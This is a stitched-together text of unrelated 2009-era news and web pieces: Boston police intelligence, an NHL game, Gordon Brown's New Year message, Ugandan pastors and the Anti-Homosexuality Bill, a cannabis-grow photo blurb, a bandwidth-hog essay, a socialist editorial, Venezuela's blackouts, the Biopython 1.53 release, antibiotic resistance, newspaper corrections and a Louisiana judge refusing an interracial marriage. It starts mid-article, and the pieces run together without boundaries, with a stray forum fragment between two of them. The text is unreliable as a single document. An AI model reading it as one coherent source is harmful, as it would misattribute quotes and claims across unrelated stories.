“ When the commissioner comes to see me to discuss command staff changes , I always say to him , ‘ It ’s your command staff ; can you live with this ?
Are these individuals going to be able to carry out your game plan . ’
That ’s all , ’’ Menino said .
He added that while he does n’t like some of Davis ’s appointments to his command staff , “ I would never say you have to get rid of him .
He has to have a team that he has faith in . ’’
Menino also acknowledged that he keeps close track of the department ’s operations , starting his every workday with a 6:30 a.m. phone call to Davis to check on how the city had fared overnight .
Menino has shown a willingness to involve himself in police policies and procedures .
Last May he rejected Davis ’s plan to arm dozens of Boston police officers with M16 semiautomatic assault rifles .
Perkins , 46 , a police officer since 1988 , was picked by former commissioner Kathleen O’Toole , to join the Intelligence Center when it was formed in 2005 .
The center quickly grew from a small unit of eight detectives to a bustling staff of 19 detectives and eight civilian analysts .
Inside the department , Perkins was considered a tough , hard - working leader who delegated authority effectively but could be overly demanding with detectives and sometimes clashed with other supervisors in other units .
Outside , he was often the public face of the agency at law enforcement conferences on intelligence gathering and had the respect of police supervisors in the other eight Boston - area communities who are part of Boston ’s regional intelligence center , said Paul Upton , deputy superintendent at the Somerville Police Department .
“ When you investigate in police work , you develop a list of go to people , they ’re the people who you can always rely on that are going to do whatever they can to help you .
For me , Earl Perkins was a go - to person , ’’ Upton said .
Last year , the US Justice and Homeland Security departments singled out the intelligence center and six other intelligence centers out of 72 nationwide to work on a pilot program designed to improve intelligence sharing without violating citizens ’ privacy .
“ We would not have made the progress we have with this program without ( the Boston center ’s ) participation , ’’ said Thomas J. O’Reilly , a senior policy advisor in the Justice Department , who is overseeing the program and has recommended that some of Boston ’s practices be adopted by the other intelligence centers across the country .
During the campaign in September , Menino was asked if the city had done enough to keep Boston safe from a terrorist attack .
6 points by parent by lol 4621 days ago | link
2 points by by jfm3 4620 days ago | link
-----
DETROIT -- Marian Hossa returned to Joe Louis Arena on Wednesday for the first time as a Chicago Blackhawk , and , amidst the boos , witnessed firsthand how badly his former team could use his services .
Antii Niemi made 33 saves as the Blackhawks defeated the Detroit Red Wings 3 - 0 , shutting them out for the second consecutive game and handing them their third loss in a row .
It is the fifth time the Red Wings have been shut out this season -- all in the past 15 games .
It is the second time they have been blanked in consecutive games and the fourth time they have been shut out at home .
Niemi is the fifth backup goalie to beat the Red Wings since Nov. 18 -- with all of those wins coming at Joe Louis Arena .
Niemi ( 8 - 1 - 1 ) has four shutouts in 10 games .
“ I thought lots of guys tried .
I think , at this time right now , their roster is better than ours , ’’ Red Wings coach Mike Babcock said .
“ It was evident as the game went on and we did n’t score .
We had an opportunity on the power play ( in the first period ) to shoot one in the empty net and we could n’t do that , and I thought it might have affected our game , for sure . ’’
The already injury - riddled Red Wings lost another player earlier in the day , as defenseman Brian Rafalski was unable to play because of the flu .
That left the club without three of its top five defensemen ( in addition to Niklas Kronwall and Jonathan Ericsson ) , all good puck - movers .
The Red Wings battled hard , playing much better than they did in a 3 - 0 loss at Chicago on Sunday .
But they could n’t match the Blackhawks ’ skill and depth .
Detroit ’s scoreless streak stands at 141 minutes , dating back to Todd Bertuzzi ’s goal at the 19 - minute mark of the second period in Saturday ’s 4 - 3 loss at Dallas .
“ We got a lot of pucks to the net , there was a lot of rebounds lying around we just could n’t get to , ’’ Detroit ’s Kris Draper said .
“ We had a good start but were n’t able to get that all - important first goal .
When you ’re struggling to score , when you have some of your big players out , you got to find a way to score early . ’’
Chicago took what appeared to be an insurmountable 2 - 0 lead on Patrick Sharp ’s goal during a four - on - four situation at 3:47 of the third period .
Sharp flipped the puck over a sprawled Jimmy Howard during a scramble in front of the net .
Hossa , who was booed vociferously almost every time he touched the puck , assisted on the goal .
Hossa led the Red Wings with 40 goals last season but signed a 12 - year , $ 62.8 million free - agent contract with Chicago on July 1 , as the salary cap prevented Detroit from matching that offer .
“ When we got down 1 - 0 , I thought we started to turn the puck over a little bit in the second half of the second period , ’’ defenseman Brad Stuart said .
“ That might be from trying to make something happen from nothing because we have n’t scored in a while .
But that ’s not the way we have to do it .
We have to keep sticking with the simple plays . ’’
The Blackhawks took advantage of a Red Wings penalty for too many men on the ice late in the first period , as Patrick Kane opened the scoring with a power - play goal at the 30 - second mark of the second period .
Kane blasted a shot from the top edge of the faceoff circle past Howard , who was screened by Troy Brouwer .
It is only the third power - play goal Detroit has allowed in its last 14 games .
Meanwhile , the Red Wings ’ power play continues to sputter .
They went 0 - for - 5 on Wednesday and are 5 - for - 58 in their past 16 games ( 8.6 percent ) .
They have gone six consecutive games without a power - play goal .
“ It ’s huge in a game like this , we can use a power - play goal or two , ’’ Stuart said .
Jonathan
Toews scored with 1:18 remaining in the third period to seal the win .
“ The guys battled hard out there for us , we just did n’t find the back of the net , ’’ Howard said .
The Blackhawks opened up a 10 - point lead over the third - place Red Wings in the Central Division .
“ They were better two nights in a row , it ’s that simple , ’’ Babcock said .
Gordon Brown will warn voters today not to " wreck the recovery " in a New Year 's message setting out the political battlelines ahead of 2010 's general election .
The Prime Minister , who polls suggest faces an uphill struggle to cling on to power , will promise to publish a blueprint to " really get Britain moving again " .
In a webcast for the Downing Street website , he will set out an optimistic assessment of the country 's prospects for economic recovery in the next 12 months .
Download the new Independent Premium app Sharing the full story , not just the headlines
But , echoing recent attacks on the Tories as elitist , he will warn against " a decade of austerity and unfairness where the majority lose out while the privileged few protect themselves " .
Only Labour policies would ensure " the people on middle and modest incomes who do n't want any special favours " benefited as well , he will say - according to extracts released in advance .
The message puts economic recovery at the top of a list of resolutions for 2010 that also includes " radical " public service reform , " a new cleaned up politics " and tackling terrorism .
And it includes a promise to publish later this week the first part of a " prosperity plan for a successful , fairer and more responsible Britain " - including investment in high - speed rail , aerospace , the digital economy , clean energy and other " industries and jobs of the future " .
Mr Brown has faced some criticism from within his own ministerial ranks for what is perceived as a bid to launch a " class war " battle with Eton- educated David Cameron 's Conservative Opposition .
But his New Year message will include a direct appeal to the party 's core vote .
" There are some who say we must plan for a decade of austerity and unfairness where the majority lose out while the privileged few protect themselves , " he will say .
" I believe we can create a decade of shared prosperity - with opportunities fairly shared among all those who work hard and play by the rules . "
Inside Politics newsletter
The latest news on Brexit , politics and beyond direct to your inbox Enter your email address Continue Continue Please enter an email address Email address is invalid Fill out this field Email address is invalid Email already exists .
Log in to update your newsletter preferences
Register with your social account or click here to log in I would like to receive updates on politics every morning by email Update newsletter preferences
In an upbeat assessment , he will go on : " We can be incredibly proud that Britain 's dynamic entrepreneurs have defied the recession to start up nearly half a million new businesses .
" There are now three million British businesses - more than at any point since records began in the 1980s , and fewer businesses closed in 2009 , than in 2008 .
" And I am confident that , if we continue with the tough decisions we have made , unemployment will start to drop this year , and more small businesses will open and flourish .
" That was n't inevitable ; it was the change we chose .
And so my message today is simple : do n't wreck the recovery .
" The recovery is still fragile , and it needs to be nurtured in the interests of those who were hit hardest by the recession - the people on middle and modest incomes who do n't want any special favours - they simply want a bit of help to own their own home , set up their own business , and give their children the best start in life " .
As the election looms - it must be held by June - the Prime Minister will declare that he believes the vast majority of British people believe things " have to " change .
" In my life , I have learnt that there are only really two kinds of people : those who think things can never change ; and those who believe they have to .
" And I think the vast majority of British people are in the second camp .
We are a nation that combines responsibility with fairness , compassion with aspiration - always reaching higher , dreaming bigger , aiming for ever greater things " .
He will conclude : " My first priority is securing the recovery while cutting the deficit in a sensible and fair way .
" The second is radical reform of our public services while protecting frontline spending on schools , hospitals and the police .
" The third is a new , cleaned up politics .
" And the fourth is maintaining Britain 's global strength and fulfilling our responsibilities against the terrorist threat from Afghanistan and the wider world .
" Britain is too great a country with so much potential - and people with such high aspirations - that in the coming decade we must not settle for anything less than big ambitions .
" We are determined to reduce the deficit at a responsible pace , without choking off the recovery or damaging the frontline services the mainstream majority rely on .
" And so our strategy is to go for growth , because we want to build our country up not talk Britain down .
" Later this week we will be publishing the first part of our prosperity plan for a successful , fairer and more responsible Britain : a plan detailing how we will invest in the industries and jobs of the future .
From high - speed rail to aerospace to the digital economy to clean energy to advanced manufacturing , 2010 is when we will really get Britain moving forward again . "
Shadow home secretary Chris Grayling said : " This backward - looking New Year message shows that despite warnings from his own Cabinet Gordon Brown remains intent on waging a negative and pointless class war .
" Gordon Brown has spent money like there is no tomorrow yet the gap between rich and poor has grown wider than ever .
This message sounds like the last throw of the dice from a Government that has no idea how to solve Britain 's problems . "
Cabinet Office Minister Tessa Jowell warned Mr Brown last week not to turn the general election campaign into a " hideous " class war with Mr Cameron .
Her warning came after Mr Brown used a recent Prime Minister 's Questions to accuse the Tory leader of pursuing policies dreamt up " on the playing fields of Eton " .
The move was seen by some observers as a retreat into a " core vote " strategy appealing to Labour 's traditional supporters rather than the broad alliance which backed Tony Blair to three election victories .
Jim Burroway
A Martin Ssempa and three other Ugandan pastors have written to Saddleback Church pastor Rick Warren demanding an apology for his statement opposing Uganda ’s proposed Anti-Homosexuality Bill .
In a letter sent sent to Warren , with copies provided to Christianity Today and Grove City College professor Warren Throckmorton , the four pastors write on behalf of a task force which met in the offices of the Minister of Ethics and Integrity , James Nsaba Buturo , who has been an ardent supporter of the bill .
The pastors say that the bill has been “ greatly misrepresented ” and describes Warren ’s opposition to the bill as “ unwarrented abuse . ”
This bill has been greatly misrepresented by some homosexual activists causing hysteria and we take this opportunity to give you the background , facts and response to the concerns you raised .
A special meeting of 20 denominational heads met on Thursday 17th Dec in the offices of the minister of Ethics and Integrity , examined your letter and formed a joint task force to respond to you as well as help support the parliament in the passage of this bill .
We are further distressed by your unwarranted abuse of our duly elected officials who are in the process of making laws in the fulfillment of their mission and make demand that you biblically issue an apology for having wronged us as demonstrated by the facts of this letter .
[ Emphasis in the original ]
The letter is very similar to a separate letter sent to Christianity Today , complete with wholesale misrepresentations of what the Anti-Homosexuality Bill would actually provide .
We have posted the full text of the bill online where you can see its provisions for yourself .
They include :
Expanding the definitions for homosexual acts , making conviction easier .
Current law requires evidence of penetration .
The new law would expand the definition of homosexual activity to “ touch ( ing ) another person with the intention of committing the act of homosexuality . ”
Touching itself is defined as “ touching — ( a ) with any part of the body ; ( b ) with anything else ; ( c ) through anything ; and in particular includes touching amounting to penetration of any sexual organ .
anus or mouth .
Affirming Uganda\ ’s lifetime imprisonment for those convicted of homosexuality .
Defining a new crime of “ aggravated homosexuality ” for those who engage in sex with someone under the age of 18 , who are HIV - positive , who is a “ repeat offender ” ( so broadly defined as to include anyone who has had a relationship with more than one person , or who had sex with the same person more than once ) , or who had sex with a disabled person ( consensual or not ) .
The penalty for “ aggravated homosexuality ” is death by hanging .
Requiring anyone arrested on suspicion of homosexuality to undergo HIV testing to determine the individual\ ’s qualification for prosecution of “ aggravated homosexuality . ”
Criminalizing “ attempted homosexuality ” with imprisonment of seven years .
Criminalizing all speech and peaceful assembly for those who advocate on behalf of LGBT citizens in Uganda with fines and imprisonment of between five and seven years .
Criminalizing the act of obtaining a same - sex marriage abroad with lifetime imprisonment .
Addding a clause which forces friends or family members to report LGBT persons to police within 24 - hours of learning about that individual\ ’s homosexuality or face fines or imprisonment of up to three years .
Penalizing landlords and hotel owners with five to seven years imprisonment for renting to LGBT people .
Adding an extra-territorial and extradition provisions , allowing Uganda to prosecute LGBT Ugandans living abroad .
Voiding all international treaties , agreements and human rights obligations which conflict with this bill .
There is an additional ominous note in this letter that is not found in the previous letter published by Christianity Today .
In describing the developments in Uganda which they say justify the draconian measure specified in the Anti-Homosexuality Bill , they single out an individual Ugandan blogger , GayUganda :
d ) creation of organizations whose sole purpose is to promote homosexuality in Uganda ; ( e.g. ( Sexual Minorities Uganda ) ; ( Gay Uganda ) ; ( Integrity Uganda ) .
This latest letter , which is reproduced on Warren Throckmorton ’s web site , demands that Warren issues an apology and sets a deadline :
Your letter has caused great distress and the pastors are demanding that you issue a formal apology for insulting the people of Africa by your very inapropriate bully use of your church and purpose driven pulpits to coerse us into the “ evil ” of Sodomy and Gaymorrah .
This is expected within seven days from this date .
The letter , at least as it is reproduced on Throckmorton ’s web site , does not appear to be dated .
Click here to see BTB \ ’s complete coverage of recent anti-gay developments in Uganda .
Got another book report to do ?
English teachers have the inconsiderate habit of assigning mammoth - sized works of literature to read and then actually expecting you to do it .
This would n't be so bad except that invariably the requisite reading is as boring as fly fishing in an empty lake .
Half of those books do n't even have discernible plots .
And let 's face it -- the Cliff 's Notes are pretty time - consuming too .
Worry no more .
Your troubles are over .
We here at Book - A - Minute Classics have come up with a solution .
We 've taken all kinds of great works of literature and boiled them down to their essence , extracting all the filler ( and believe me , there 's a lot of it sometimes ) .
In just one minute , you can read entire books and learn everything your teachers will expect you to know .
" That 's nice , " you say , " but I do n't believe you . "
Yah hah , skeptical soul !
We 've got our collection of ultra - condensed books right here !
We 've got everything from Shakespeare to Steinbeck !
See for yourself !
The Ultra-Condensed Classic Books Latest additions : 4/6/12
If you liked Book - A - Minute Classics , try our other Book - A - Minute pages :
And try our companion site :
RinkWorks
Book - A - Minute Classics is a RinkWorks production .
We invite you to visit our other sites .
Talk Back
Talk to us !
We live to hear feedback from our readers .
So feel free to send us email and tell us how funny we are .
Please read this before you send your own condensed books .
And please read this before you flame us .
Legalese
Titles and trademarks are the property of their owners .
The material at this site is Copyright © 1997 - 9 by Samuel Stoddard and David J. Parker .
We can not be held responsible if you write a book report or research paper using our site and do n't get a good grade .
Growing weed pictures
Here is a completely awesome set of weed seed pictures I found over at Hemp City that follows an outdoor grow setup from June to December and it allows you to look watch the process of staring growing weed and the growth of it from the seed to the joint that the guy smokes at the end .
It ’s a beautiful organic cannabis growing process that I wish I could take part in , alas , it ’s still illegal to grow weed here .
One day that will change .
In the meantime all we can do is look at this guys grow and be jealous that it does n’t belong to us .
Every ISP 's discussions of pricing plans , net neutrality or piracy invoke the same faceless villains : the bandwidth hogs .
Benoît Felten , analyst and blogger , has been working in telecom for over a decade , and he wants proof these monsters even exist .
Advertisement
With the debate on net neutrality in full swing in the US , we 've been hearing about Bandwidth Hogs again .
' Bandwidth Hog ' is a sound bite that conveys a strong emotion : you can virtually see the fat pig chomping on the bandwidth , pushing back all the other animals in the barnyard with his fat pig shoulders all the while scrutinizing with his shiny piggy eyes to see if the farmer is n't around ...
Advertisement
The image is so powerful that everyone thinks they understand what the term means , no one questions if the analogy is correct .
In discussing this issue , Herman and I realised we had serious doubts about the existence of that potentially mythical beast .
In fact , we are not sure even the telcos know what a bandwidth hog is and does .
But it makes great headlines : " Net Neutrality will force the telco's to give The Internet away to Bandwidth Hogs " .
They claim that bandwidth hogs steal all the bandwidth and cause network congestion , and therefore their behaviour harms all the other regular and peaceful law - abiding users .
And to add insult to injury they pay the same price as the others !
No , policing and rationing must be applied by the benevolent telco to protect the innocent .
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Unfortunately , to the best of our knowledge , the way that telcos identify the Bandwidth Hogs is not by monitoring if they cause unfair traffic congestion for other users .
No , they just measure the total data downloaded per user , list the top 5 % and call them hogs .
For those service providers with data caps , these are usually set around 50 Gbyte and go up to 150 Gbyte a month .
This is therefore a good indication of the level of bandwidth at which you start being considered a " hog " .
But wait : 50 Gbyte a month is … 150 kbps average ( 0,15 Mbps ) , 150 Gbyte a month is 450 kbps on average .
If you have a 10 Mbps link , that 's only 1,5 % or 4,5 % of its maximum advertised speed !
Advertisement
And that would be " hogging " ?
The fact is that what most telcos call hogs are simply people who overall and on average download more than others .
Blaming them for network congestion is actually an admission that telcos are uncomfortable with the ' all you can eat ' broadband schemes that they themselves introduced on the market to get people to subscribe .
In other words , the marketing push to get people to subscribe to broadband worked , but now the telcos see a missed opportunity at price discrimination ...
Advertisement
As Herman explains in his post , TCP / IP is by definition an egalitarian protocol .
Implemented well , it should result in an equal distribution of available bandwidth in the operator 's network between end -users ; so the concept of a bandwidth hog is by definition an impossibility .
An end - user can download all his access line will sustain when the network is comparatively empty , but as soon as it fills up from other users ' traffic , his own download ( or upload ) rate will diminish until it's no bigger than what anyone else gets .
Now I 'm pretty sure that many telcos will disagree with our assessment of this .
So here 's a challenge for them : in the next few days , I will specify on this blog a standard dataset that would enable me to do an in - depth data analysis into network usage by individual users .
Any telco willing to actually understand what 's happening there and to answer the question on the existence of hogs once and for all can extract that data and send it over to me , I will analyse it for free , on my spare time .
All I ask is that they let me publish the results of said research ( even though their names need not be mentioned if they do n't wish it to be ) .
Of course , if I find myself to be wrong and if indeed I manage to identify users that systematically degrade the experience for other users , I will say so publicly .
If , as I suspect , there are no such users , I will also say so publicly .
The data will back either of these assertions .
Advertisement
Please email me if you 're interested .
And please publicise this offer if you 're not in a position to extract such a dataset but are still interested in the answer .
This is a much more important question than knowing how many angels can dance on the head of a pin !
Reprinted with permission from Fiberevolution ; written in collaboration with Dadamotive .
Megahog source image from the AP via TheAge
Socialism and the defense of public education
24 December 2009
The Obama administration is spearheading an unprecedented assault on public education in the US .
While providing trillions of dollars to Wall Street , Obama has starved states and local governments of funding and pressed them to address their soaring budget deficits by closing public schools and opening semi-private charter schools .
In Michigan and other states , school districts are slashing jobs and eliminating essential services such as student transportation .
The school week in Hawaii has been reduced to four days due to teacher furloughs .
The cutbacks have been extended to higher education as well , with California leading the way by imposing a 32 percent tuition increase .
What little federal funding the Obama administration has made available — a meager $ 4 billion in its “ Race to the Top ” program — is contingent on school districts dropping restrictions on the expansion of charter schools and tying school funding and teachers ’ pay to standardized test scores .
The catastrophe facing the public schools is the culmination of three decades of attacks on education , which has coincided with a general assault on the social position and democratic rights of the working class .
The assault began in earnest in the 1980s with Reagan , who halved the federal share of education funding .
It continued with Clinton ’s promotion of charter schools and “ school choice ” in the 1990s and Bush ’s “ No Child Left Behind Act , ” co-sponsored by Democratic Senator Edward Kennedy .
It has no doubt come as a shock to many teachers and supporters of public education that the current administration , elected by appealing to popular sentiment for an end to social reaction and exploiting the belief that an African - American president would be more sympathetic to working people , has become the vehicle for an even more ruthless attack on the public schools .
However , the assault on education is of a piece with all of Obama ’s policies , including the escalation of war and the further enrichment of the financial aristocracy .
The policies of Obama and his education secretary , Arne Duncan , represent a repudiation of the basic democratic principle that all children , regardless of their socio- economic background , have the right to a free , quality education .
The administration is spearheading the transformation of education into a largely privatized system , with government subsidies provided to charter schools which are designed to educate only a fraction of working class youth .
The rest are condemned to schools that are more like holding pens than centers of learning .
Quality education is fast becoming a privilege of the few , not the right of all .
Detroit , the poorest major city in the US , has become a focal point of this attack .
Working closely with the Obama administration as well as the American Federation of Teachers and its Detroit local , the school district ’s state - appointed “ emergency financial director ” has just imposed a contract that forces each teacher to “ loan ” the district $ 10,000 from their pay over the next two years .
The contract will accelerate the closing of so - called “ failing schools ” and the firing of experienced teachers , combined with the establishment of “ priority schools ” for a select section of students .
Conditions of mass unemployment in the former center of world auto production , compounded by aged and inadequately maintained school buildings and a shameful dearth of basic tools such as books , computers , labs , etc. , have led to falling test scores and plummeting graduation rates .
Far from seeking to reverse this disaster , the politicians and school administrators have utilized the crisis to scapegoat the teachers and undermine public confidence in the public school system .
This is a deliberate class policy .
The American ruling elite , dominated by a fabulously rich and corrupt financial oligarchy , has no intention of investing money to educate large sections of working class youth who face a future of unemployment or poverty - level wages .
The most critical measure of the health of a society is the value it places and resources it dedicates to raising the cultural and intellectual level of the next generation .
The state of public education in the US is an indictment of capitalist society .
Social equality and education
The establishment of public schools in the US was the product of the revolutionary struggles of the 18th and 19th centuries against social inequality and oppression .
The greatest leaders of the American Revolution believed that every individual had innate potential , which could be realized if he was provided with the means to gain knowledge and training .
Thomas Jefferson in 1779 proposed a bill for the “ more general diffusion of knowledge . ”
It called for the establishment of free public schools .
This , he said , would “ bring into action that mass of talents which lies buried in poverty in every country for want of the means of development ... ”
An educated populace , the American revolutionaries believed , was the only means to prevent tyranny and oppression .
The public cost for establishing a system of free schools , Jefferson said , would be “ not more than the thousandth part of what will be paid to kings , priests and nobles who will rise up among us if we leave the people in ignorance . ”
The fighters for public education — from the “ father of the common school ” Horace Mann , the abolitionist Thaddeus Stevens and the philosopher John Dewey , to the early working class and socialist leaders and the pioneers of the civil rights movement — were driven by a profound belief that every child — whether a former slave , child laborer or working class immigrant — should and could be educated , and that the continued existence of democracy depended on it .
Today , the American corporate and political establishment has repudiated this egalitarian conception .
In its eyes , the cost of educating tens of millions of working class youth — especially in the inner cities — is an intolerable infringement on its wealth .
This misanthropic class policy is camouflaged by invocations to “ individual responsibility . ”
As Obama — who has made his career and his millions by lending his services to the rich and powerful — has repeatedly declared , poverty and decaying schools are “ no excuse for failure . ”
The assault on public education is the outcome of the growth of social inequality in America , which , in turn , is the most perverse expression of the decay of American and world capitalism .
The immense and growing chasm between the top 1 percent of society and the broad mass of the population is incompatible with democracy .
The destruction of public education is a profound expression of the terminal crisis of democracy in the US .
The US financial aristocracy , parasitic and criminal in its social and economic essence , exercises a de facto dictatorship , dominating both parties and every political institution .
It is organically hostile to democratic principles .
The impact of decades of political reaction , the collapse of the old labor movement and the semi-criminalization of socialist politics and thought have blighted intellectual and cultural life .
The critical and oppositionist liberal intelligentsia of the past has long since ceased to exist .
On basic issues of policy , the Democratic and Republican parties have become virtually indistinguishable , as exemplified by the Obama administration ’s continuation of the militarist and pro-corporate policies of the Bush administration .
No section of the political establishment is committed to the defense of democratic rights , including the right to a decent education .
As for the unions , they have become corporatist partners in the destruction of the living standards of social conditions of the working class .
The American Federation of Teachers and National Education Association have signed on to the anti-education and anti-teacher policies of the corporate elite and the government , hoping thereby to secure the salaries and perks of the union executives .
The crisis of public education in the US is deeply rooted in the crisis of the existing economic and political system .
The fight to defend education is a political and revolutionary question .
Public education can be defended only through the struggle for socialism .
This means the mobilization of the working class to break the grip of the financial aristocracy and establish the democratic control of working people over economic and political life .
This is the only way to allocate the wealth produced by the working class and utilize the immense technological and human resources that already exist to improve the schools and raise the economic and cultural level of the people , instead of their being plundered for the benefit of a modern - day aristocracy .
The fight of teachers , students and parents to defend public education is a political struggle against the Obama administration , the Democrats and Republicans , and the capitalist system , which they defend .
Jerry White
Jerry White
THE economy is in recession but sales of at least two items are booming in Venezuela : water - storage tanks and portable generators .
A country that has claimed the world 's biggest oil reserves and is home to its fourth - mightiest river , the Orinoco , has recently been forced to ration both water and electricity .
Hugo Chávez , the leftist president , blames the profligacy of consumers and a drought caused by El Niño weather .
Certainly , lower rainfall has cut the flow to the country 's main hydroelectric dam ( which provides three - fifths of its electricity ) by a tenth .
But the opposition , and several independent experts , say the underlying cause is the government 's failure to plan , maintain and invest in the necessary infrastructure .
Only a quarter of the funds budgeted for power generation have in fact been spent on it , says Víctor Poleo , who was deputy minister for electricity early in Mr Chávez 's decade in power .
In 2007 the president compounded the problem by nationalising what remained of the private power industry .
Since then there have been half - a- dozen national blackouts .
Meanwhile , demand for electricity has grown by an annual average of 4.5 % .
Thermal plants cannot be used to take up the slack .
They have been neglected .
Four out of five turbines at the biggest of them , Planta Centro on the Caribbean coast , are out of action .
Even José Vicente Rangel , an ultraloyal chavista and the former vice - president , was moved to ask : “ What 's going on ?
Why have n't urgent and drastic measures been taken ? ”
The perception that the government has bungled is contributing to a fall in Mr Chávez 's popularity rating , now put at 46 % by Datanálisis , a pollster .
Mr Chávez has called on Venezuelans to take quicker showers .
“ Some people sing in the bath for half an hour , ” he told a recent cabinet meeting , broadcast live .
“ What kind of communism is that ?
Three minutes is more than enough ! ”
It is true that Venezuelans are not thrifty by nature .
But the government has hitherto done nothing to encourage them to conserve water or energy .
Utility rates have been frozen for most of Mr Chávez 's time in office .
The president faces crucial parliamentary elections next year and needs to woo voters .
But after ten years of neglect , there is no quick fix for crumbling infrastructure .
“ There is no PR trick that will make the crisis go away , ” says Mr Poleo .
Biopython 1.53 released
We are pleased to announce the availability of Biopython 1.53 , a new stable release of the Biopython library , three months after the release of Biopython 1.52 .
This is our first release since migrating from CVS to git for source code control .
There have been some additions to our core objects – the Seq ( and related UnknownSeq ) objects gained upper and lower methods ( like the string methods of the same name but alphabet aware ) plus a new ungap method .
The SeqFeature object now has an extract method to get the region of sequence it describes ( useful for getting CDS nucleotide sequences from GenBank files ) .
Also SeqRecord objects now support addition , giving a new SeqRecord with the combined sequence , all the SeqFeatures , and any common annotation .
SQLite support ( built into Python 2.5 + ) was added to our BioSQL interface ( Brad Chapman ) .
This is still a little experimental as we are using a draft BioSQL SQLite schema , but this should be merged into the next BioSQL release .
Biopython now includes wrappers for the new NCBI BLAST C++ tools , which will be replacing the old NCBI “ legacy ” BLAST tools written in C .
The plain text BLAST parser has been updated to cope as well .
Nevertheless , we ( and the NCBI ) still recommend using the XML output for parsing .
Bio .
Entrez includes the new ( Jan 2010 ) DTD files from the NCBI for parsing MedLine / PubMed data .
The NCBI codon tables have been updated from version 3.4 to 3.9 , which adds a few extra start codons , and a few new tables ( Tables 16 , 21 , 22 and 23 ) .
The restriction enzyme list in Bio.
Restriction has been updated to the Nov 2009 release of REBASE .
The Bio.PDB parser and output code has been updated to understand the element column in ATOM and HETATM lines ( based on patches contributed by Hongbo Zhu and Frederik Gwinner ) , and Bio.
PDB.PDBList has been updated for recent changes to the PDB FTP site ( Paul T. Bathen ) .
Finally , support for running Biopython under Jython ( using the Java Virtual Machine ) has been much improved ( with input from Kyle Ellrott ) .
Note that Jython does not support C code , and currently Jython does not parse DTD files ( Jython Issue 1447 ; needed for the Bio. Entrez XML parser ) .
However , most of the Biopython modules seem fine from testing with Jython 2.5.0 and 2.5.1 .
Sources and Windows Installers are available from our downloads page .
Thanks to the Biopython development team and to everyone who has reported bugs or contributed patches since our last release .
( At least ) 12 people contributed to this release , including 3 first timers :
Bartek Wilczynski
Brad Chapman
Chris Lasher
Cymon Cox
Frank Kauff
Frederik Gwinner ( first contribution )
Hongbo Zhu ( first contribution )
Kyle Ellrott
Leighton Pritchard
Michiel de Hoon
Paul Bathen ( first contribution )
Peter Cock
Antibiotic resistance in the natural environment is rising despite tighter controls over our use of antibiotics in medicine and agriculture , Newcastle University scientists have found .
Bacterial DNA extracted from soil samples collected between 1940 and 2008 has revealed a rise in background levels of antibiotic resistant genes .
Newcastle University 's Professor David Graham , who led the research , said the findings suggest an emerging threat to public and environmental health in the future .
" Over the last few decades there has been growing concern about increasing antibiotic resistance and the threat it poses to our health , which is best evidenced by MRSA , " explained Professor Graham , who is based in the School of Civil Engineering and Geosciences at Newcastle University .
" Despite increasingly stringent controls on our use of antibiotics , the background level of antibiotic resistant genes , which are markers for potential resistance , continues to rise in soils . "
" This increases the chances of a resistant gene in a harmless bacteria being passed onto a disease - causing pathogen , such as a MRSA , with obvious consequences . "
Published online this week in the academic journal Environmental Science and Technology , the report uses data taken from five sites in the Netherlands .
The team found that 78 per cent of genes from four classes of antibiotics showed increasing levels since 1940 -- despite continued efforts to reduce environmental levels .
Professor Graham said the next step would be to analyse soil samples from other parts of the world , although he expects to see similar results .
He adds : " The big question is that with more stringent European regulations and greater emphasis on conservative antibiotic use in agriculture and medicine , why are antibiotic resistant gene levels still rising ? "
" Whatever the cause , this rise suggests an ever increasing risk of resistant genes being passed from environmental organisms to organisms of greater health concern . "
Professor Graham contends that more complementary studies are desperately needed between environmental and public health researchers to determine whether this increasing ' pool ' of resistance is actually contributing to harmful bacteria , such as MRSA .
• We should not have put the headline " Israel admits harvesting Palestinian organs " on a story about an admission , by the former head of the Abu Kabir forensic institute near Tel Aviv , that during the 1990s specialists at the institute harvested organs from the bodies of Israeli soldiers , Israeli citizens , Palestinians and foreign workers without getting permission from the families of the deceased ( 21 December , page 15 ) .
That headline did not match the article , which made clear that the organs were not taken only from Palestinians .
This was a serious editing error and the headline has been changed online to reflect the text of the story written by the reporter .
• A leader in praise of Cumbrian spirit said that the county council 's motto , Ad montes oculos levavi , translated strictly as " I shall lift up mine eyes to the hills " .
That should have been " I have lifted up mine eyes to the hills " ( 10 December , page 36 ) .
• A diary item expressed the view that an actor playing Michael Martin , former Speaker of the House of Commons , would keep the place looking nice , though he might not excel at the Woolsack .
Quite right : he would be in the wrong chamber – the Woolsack is in the House of Lords ( 18 December , page 37 ) .
Louisiana justice of peace says he refused to marry mixed race couple out of concern for children they might have
This article is more than 10 years old
This article is more than 10 years old
A Louisiana justice of the peace said he refused to issue a marriage licence to an interracial couple out of concern for any children the couple might have .
Keith Bardwell , justice of the peace in Tangipahoa parish , said it was his experience that most interracial marriages did not last long .
" I 'm not a racist .
I just do n't believe in mixing the races that way , " Bardwell said .
" I have piles and piles of black friends .
They come to my home , I marry them , they use my bathroom .
I treat them just like everyone else . "
Bardwell said he asked everyone who called about marriage if they were a mixed race couple .
If they were , he did not marry them .
Bardwell said he had discussed the topic with black and white people , along with witnessing some interracial marriages .
He came to the conclusion that most of black society did not readily accept offspring of such relationships , and nor did white society .
" There is a problem with both groups accepting a child from such a marriage .
I think those children suffer and I wo n't help put them through it . "
If he did an interracial marriage for one couple , he must do the same for all , he said .
" I try to treat everyone equally . "
Bardwell estimates that he has refused to marry about four couples during his career .
Beth Humphrey , 30 , and Terence McKay , 32 , both of Hammond , said they would consult the US justice department about a discrimination complaint .
Humphrey , an account manager for a marketing firm , said she and McKay , a welder , had just returned to Louisiana .
She is white and he is black .
She plans to enrol in the University of New Orleans to pursue a masters degree in minority politics .
" That was one thing that made this so unbelievable , " she said .
" It 's not something you expect in this day and age . "
Humphrey said that when she called Bardwell on 6 October to inquire about getting a marriage licence signed his wife told her he would not sign marriage licences for interracial couples .
Bardwell suggested the couple go to another justice of the peace in the parish who agreed to marry them .
" We are looking forward to having children , " Humphrey said .
" And all our friends and co-workers have been very supportive .
Except for this , we 're typical happy newlyweds . "
Katie Schwartzmann , an attorney for the American Civil Liberties Union of Louisiana , said it was " really astonishing and disappointing " to see such a case in 2009 .
" The supreme court ruled as far back as 1963 that the government cannot tell people who they can and cannot marry . "
The ACLU has asked the Louisiana judiciary committee , which oversees state justices of the peace , to investigate Bardwell and recommended " the most severe sanctions available , because such blatant bigotry poses a substantial threat of serious harm to the administration of justice " .
